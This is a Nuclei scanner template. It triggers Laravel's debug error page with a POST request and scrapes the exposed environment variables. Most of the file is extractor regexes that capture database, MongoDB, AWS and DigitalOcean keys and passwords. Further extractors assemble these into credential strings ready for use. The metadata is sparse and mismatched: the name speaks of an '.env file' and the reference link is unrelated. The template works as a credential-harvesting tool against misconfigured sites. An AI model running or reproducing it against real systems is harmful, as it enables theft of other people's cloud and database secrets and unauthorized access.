id: laravel-debug
info:
  name: Laravel .env file accessible
  author: 0x0xporn
  severity: critical
  description: Laravel.
  reference: https://neal.fun/
  tags: config,exposure,laravel
  
http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Flock/3.5.3.4628 Chrome/7.0.517.450 Safari/534.7

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - contains(body,"DB_PASSWORD")          
          - contains(body,"DB_PASS")                    
          - contains_all(body,"DB_USERNAME","DB_PASSWORD")
          - contains(body,"AWS_KEY")
          - contains(body,"DO_KEY")
        condition: or

      - type: regex
        regex:
          - "(?mi)^APP_(NAME|ENV|KEY|DEBUG|URL|PASSWORD)"
          - "(?mi)^DB_(HOST|PASSWORD|DATABASE)"
          - "(?mi)^(SQS|SNS|SES|BACKUP|AWS)_(ACCESS_KEY_ID|SECRET_ACCESS_KEY)"
          - '(?i)(FTP_(USER|PASS))'
        condition: or

#      - type: word
#        part: body
#        words:
#          - 'vendor/laravel/framework/src/Illuminate/'
#          - 'MethodNotAllowedHttpException'
#        condition: and


#      - type: status
#        status:
#          - 301
#          - 405
#          - 500
#          - 501
#          - 502
#          - 503
#          - 200
#          - 206
#        condition: or

    extractors:
      - type: regex
        part: body
        name: db_host
        internal: true
        group: 3
        regex:
          - "(?mi)<td>(DB|DATABASE)_(HOST|HOSTNAME)<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
      - type: regex
        part: body
        name: db_port
        internal: true
        group: 2
        regex:
          - "(?mi)<td>(DB|DATABASE)_PORT<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
      - type: regex
        part: body
        name: db_name
        internal: true
        group: 3
        regex:
          - "(?mi)<td>(MYSQL|DB)_(DATABASE|NAME)<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
      - type: regex
        part: body
        name: db_user
        internal: true
        group: 3
        regex:
          - "(?mi)<td>(MYSQL|DB|DATABASE)_(USER|USERNAME)<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
      - type: regex
        part: body
        name: db_password
        internal: true
        group: 3
        regex:
          - "(?mi)<td>(MYSQL|DB|DATABASE)_(PASS|PASSWORD|PASSWD)<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"

      - type: regex
        part: body
        name: mongo_host
        internal: true
        group: 3
        regex:
          - "(?mi)<td>(MONGO_DB|MONGO)_(HOST|HOSTNAME)<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
      - type: regex
        part: body
        name: mongo_port
        internal: true
        group: 2
        regex:
          - "(?mi)<td>(MONGO_DB|MONGO)_PORT<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
      - type: regex
        part: body
        name: mongo_name
        internal: true
        group: 3
        regex:
          - "(?mi)<td>(MONGO_DB|MONGO)_(DATABASE|NAME)<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
      - type: regex
        part: body
        name: mongo_user
        internal: true
        group: 3
        regex:
          - "(?mi)<td>(MONGO_DB|MONGO)_(USER|USERNAME)<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
      - type: regex
        part: body
        name: mongo_password
        internal: true
        group: 3
        regex:
          - "(?mi)<td>(MONGO_DB|MONGO)_(PASS|PASSWORD|PASSWD)<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"          

      - type: regex
        part: body
        name: aws_key
        internal: true
        group: 1
        regex:
          - "(?mi)<td>AWS_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_SNS_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_S3_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_ACCESS_KEY_ID_2<\\/td>\\s+<td><pre.*>(.*?)<\\/span>" 
          - "(?mi)<td>AWS_ACCESS_KEY_ID<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>BACKUP_S3_ACCESS_KEY_ID<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>WAS_ACCESS_KEY_ID<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_TEXTRACT_KEY_ID<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_SES_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>SES_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_ACCESS_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>S3_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"         
          - "(?mi)<td>S3_ACCESS_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"      

      - type: regex
        part: body
        name: aws_sec
        internal: true
        group: 1
        regex:
          - "(?mi)<td>AWS_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_SNS_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_S3_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_SECRET_ACCESS_KEY_2<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_SECRET_ACCESS_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>BACKUP_S3_SECRET_ACCESS_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>WAS_SECRET_ACCESS_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_TEXTRACT_KEY_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>SES_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_SES_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>AWS_SECRET_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>S3_PASSWORD<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"          
          - "(?mi)<td>S3_ACCESS_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"

      - type: regex
        part: body
        name: do_key
        internal: true
        group: 1
        regex:
          - "(?mi)<td>DIGITALOCEAN_SPACES_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>DO_SPACES_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>SPACES_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>SPACES_ACCESS_KEY_ID<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>STORAGE_DIGITALOCEAN_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>DO_ACCESS_KEY_ID<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>DIGITAL_OCEAN_API_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"                    
          - "(?mi)<td>SPACE_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>CLOUD_ACCESS_KEY_ID<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"  
          - "(?mi)<td>DOS_ACCESS_KEY_ID<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"     

      - type: regex
        part: body
        name: do_sec
        internal: true
        group: 1
        regex:
          - "(?mi)<td>DIGITALOCEAN_SPACES_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>DO_SPACES_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>SPACES_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>SPACES_SECRET_ACCESS_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>STORAGE_DIGITALOCEAN_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>DO_SECRET_ACCESS_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>DIGITAL_OCEAN_API_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"                    
          - "(?mi)<td>SPACE_SECRET<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"
          - "(?mi)<td>CLOUD_SECRET_ACCESS_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>" 
          - "(?mi)<td>DOS_SECRET_ACCESS_KEY<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"           

      - type: regex
        part: body      
        name: aws_rds
        regex:
          - '[0-9a-z._-]+.rds.amazonaws.com'          

      - type: regex
        part: body
        name: database_url
        group: 1
        regex:
          - "(?mi)<td>DATABASE_URL<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"  
          - "(?mi)<td>DB_URL<\\/td>\\s+<td><pre.*>(.*?)<\\/span>"  

      - type: dsl  # type of the extractor
        name: aws_leak
        dsl:
          - '"AWS_KEY=" + aws_key + "|AWS_SEC=" + aws_sec '

      - type: dsl  # type of the extractor
        name: do_cred
        dsl:
          - '"DO_KEY=" + do_key + "|DO_SEC=" + do_sec '

      - type: dsl
        name: db_cred
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + db_port + "|DB_USER=" +  db_user + "|DB_PASSWORD=" + db_password + "|DB_NAME=" + db_name'

      - type: dsl
        name: mongo_cred
        dsl:
          - '"MONGO_HOST=" + mongo_host + "|MONGO_PORT=" + mongo_port + "|MONGO_USER=" +  mongo_user + "|MONGO_PASSWORD=" + mongo_password + "|MONGO_NAME=" + mongo_name'